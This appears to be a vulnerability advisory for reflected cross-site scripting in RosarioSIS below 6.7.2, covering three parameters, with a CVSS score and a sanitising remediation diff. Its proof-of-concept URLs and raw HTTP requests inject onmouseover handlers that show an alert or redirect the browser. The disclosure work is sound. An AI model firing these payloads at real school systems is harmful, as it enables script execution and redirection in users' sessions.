GitLab

Reflected Cross-Site Scripting vulnerability in Preferences.php, PrintSchedules.php, and Search.inc.php in RosarioSIS Student Information System < 6.7.2 allows remote attackers to execute arbitrary javascript via embedding javascript in the 'tab', 'include_inactive', and 'advanced' parameters in a GET request.

Plugin	README
Vulnerability type:	Cross-Site Scripting vulnerability (XSS)
Vendor of the product(s):	RosarioSIS
Affected product(s)/code base:	Tested on version 6.7.2
Has vendor confirmed or acknowledged the vulnerability:	Yes
Attack type:	Reflected XSS
Impact & Description:	C:L/I:L/A:N
Affected component:	modules/Users/Preferences.php, modules/Scheduling/PrintSchedules.php, and modules/Users/Search.inc.php
Attack vector(s):	Remote
Proof of concept (PoC):	Details below
Reference(s):	#291 (closed)
CVSS v3.1 details:	AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

PoC links:

# e1
http://RosarioSIS.edu/Modules.php?modname=Users/Preferences.php&tab=1%22onmouseover%3d%22location=`https://google.com`
# e2
http://RosarioSIS.edu/Modules.php?modname=Users/Preferences.php&tab=1"onmouseover%3d"alert(`xss`)

# Full redirect injection PoC
GET /Modules.php?modname=Users/Preferences.php&tab=1%22onmouseover%3d%22location=`https://google.com` HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: RosarioSIS=<Cookie>

---

"include_inactive" in modules/Scheduling/PrintSchedules.php has the same issue.

PoC links:

# e1
http://RosarioSIS.edu//Modules.php?modname=Scheduling/PrintSchedules.php&modfunc=&search_modfunc=list&next_modname=Scheduling/PrintSchedules.php&include_inactive=1%22onmouseover%3d%22location=`https://google.com`%22style%3d%22
# e2
http://RosarioSIS.edu/Modules.php?modname=Scheduling/PrintSchedules.php&modfunc=&search_modfunc=list&next_modname=Scheduling/PrintSchedules.php&include_inactive=1%22onmouseover%3d%22alert(1)%22style%3d%22

# Full redirect injection PoC
GET/Modules.php?modname=Scheduling/PrintSchedules.php&modfunc=&search_modfunc=list&next_modname=Scheduling/PrintSchedules.php&include_inactive=1%22onmouseover%3d%22location=`https://google.com`%22style%3d%22 HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: RosarioSIS=<Cookie>
Upgrade-Insecure-Requests: 1
If-None-Match: W/e3614b5b6e43dba48c2aa042cbd2d046
Cache-Control: max-age=0

---

"advanced" in modules/Users/Search.inc.php has the same issue.

PoC links:

# e1
http://RosarioSIS.edu/Modules.php?modname=Users/User.php&next_modname=Users/User.php&advanced=1%22onmouseover%3d%22alert(`xfr`)%22
# e2
http://RosarioSIS.edu/Modules.php?modname=Users/User.php&next_modname=Users/User.php&advanced=1"onmouseover%3d"location=`https://google.com`"

# Full redirect injection PoC
GET /Modules.php?modname=Users/User.php&next_modname=Users/User.php&advanced=1"onmouseover%3d"location=`https://google.com`" HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: RosarioSIS=<Cookie>
Upgrade-Insecure-Requests: 1
If-None-Match: W/e3614b5b6e43dba48c2aa042cbd2d046
Cache-Control: max-age=0

Remediation example:

[email protected]:/usr/src/rosariosis# diff ./modules/Users/Preferences.php ./modules/Users/Preferences.php.bk
126,128c126,127
< 	$ttt = $_REQUEST['tab'];
< 	$ttt = htmlspecialchars(strip_tags($ttt));
< 	echo '<form action="Modules.php?modname=' . $_REQUEST['modname'] . '&amp;tab=' . $ttt . '" method="POST">';
---
>
> 	echo '<form action="Modules.php?modname=' . $_REQUEST['modname'] . '&amp;tab=' . $_REQUEST['tab'] . '" method="POST">';
[email protected]:/usr/src/rosariosis#